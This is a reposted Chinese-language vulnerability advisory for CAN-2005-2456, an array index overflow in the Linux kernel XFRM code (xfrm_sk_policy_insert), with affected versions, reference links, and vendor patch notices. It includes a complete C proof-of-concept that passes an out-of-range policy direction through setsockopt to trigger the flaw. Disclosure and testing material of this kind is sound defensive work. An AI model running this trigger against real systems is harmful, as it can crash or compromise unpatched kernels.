Linux Kernel XFRM数组索引溢出漏洞

2008-04-09 04:17:36来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Linux Kernel XFRM数组索引溢出漏洞

发布日期:2005-08-05
更新日期:2006-01-12

受影响系统:
Linux kernel < 2.6.13-rc4
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux 9.3
S.u.S.E. Linux 9.2
S.u.S.E. Linux 9.1
Novell Linux Desktop 9
不受影响系统:
Linux kernel 2.6.13-rc4
描述:
BUGTRAQ ID: 14477
CVE(CAN) ID: CAN-2005-2456

Linux Kernel是开放源码操作系统Linux所使用的内核。

Linux Kernel的xfrm_user.c文件的xfrm_sk_policy_insert函数中存在数组索引溢出。如果将大于XFRM_POLICY_OUT的p->dir值用作sock->sk_policy数组的索引的话,就可以触发这个漏洞,导致拒绝服务或执行任意代码。

<*来源:Balazs Scheidler (bazsi@balabit.hu)

链接:netdev@vger.kernel.org/msg00520.html" target="_blank">http://www.mail-archive.com/netdev@vger.kernel.org/msg00520.html
netdev@vger.kernel.org/msg00523.html" target="_blank">http://www.mail-archive.com/netdev@vger.kernel.org/msg00523.html
http://lwn.net/Alerts/153520/?format=printable
http://lwn.net/Alerts/154615/?format=printable
http://www.novell.com/linux/security/advisories/2005_50_kernel.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <linux/xfrm.h>

#define IP_XFRM_POLICY 17

int
main()
{
int fd;
struct sockaddr_in s_in;
struct xfrm_userpolicy_info xp;

inet_aton("192.168.13.8", &s_in.sin_addr);
s_in.sin_family = AF_INET;
s_in.sin_port = htons(555);
fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (fd < 0)
{
perror("socket");
return 1;
}
if (connect(fd, (struct sockaddr *) &s_in, sizeof(s_in)) < 0)
{
perror("connect");
return 1;
}

inet_aton("192.168.13.7", (struct in_addr *) &xp.sel.saddr);
xp.sel.prefixlen_s = 32;
inet_aton("192.168.13.8", (struct in_addr *) &xp.sel.daddr);
xp.sel.prefixlen_d = 32;
xp.sel.dport = 0;
xp.sel.dport_mask = 0;
xp.sel.sport = 0;
xp.sel.sport_mask = 0;
xp.sel.family = AF_INET;
xp.sel.proto = 0;
xp.sel.ifindex = 0;
xp.sel.user = 0;
xp.lft.soft_byte_limit = 10000000;
xp.lft.hard_byte_limit = 10000000;
xp.lft.soft_packet_limit = 10000000;
xp.lft.hard_packet_limit = 10000000;
xp.lft.soft_add_expires_seconds = 3600;
xp.lft.hard_add_expires_seconds = 3600;
xp.lft.soft_use_expires_seconds = 3600;
xp.lft.hard_use_expires_seconds = 3600;
xp.curlft.bytes = 0;
xp.curlft.packets = 0;
xp.curlft.add_time = 0;
xp.curlft.use_time = 0;
xp.priority = 0;
xp.index = 0;
xp.dir = XFRM_POLICY_FWD;
xp.action = XFRM_POLICY_ALLOW;
xp.flags = 0;
xp.share = XFRM_SHARE_UNIQUE;

if (setsockopt(fd, SOL_IP, IP_XFRM_POLICY, &xp, sizeof(xp)) < 0)
{
perror("setsockopt(IP_XFRM_POLICY)");
return 1;
}

send(fd, "abrakadabra", 11, 0);
close(fd);
}

建议:
厂商补丁:

Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.kernel.org/

RedHat
------
RedHat已经为此发布了安全公告(RHSA-2005:663-01和RHSA-2005:514-01)以及相应补丁:
RHSA-2005:663-01:Updated kernel packages available for Red Hat Enterprise Linux 3 Update 6
链接:http://lwn.net/Alerts/153520/?format=printable

RHSA-2005:514-01: Updated kernel packages available for Red Hat Enterprise Linux 4 Update 2
链接:http://lwn.net/Alerts/154615/?format=printable

S.u.S.E.
--------
S.u.S.E.已经为此发布了一个安全公告(SUSE-SA:2005:050)以及相应补丁:
SUSE-SA:2005:050:kernel multiple security problems
链接:http://www.novell.com/linux/security/advisories/2005_50_kernel.html

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Apple QuickTime畸形GIF堆溢出漏洞

下一篇:Cisco安全监控分析和响应系统(CS-MARS)默认管理口令漏洞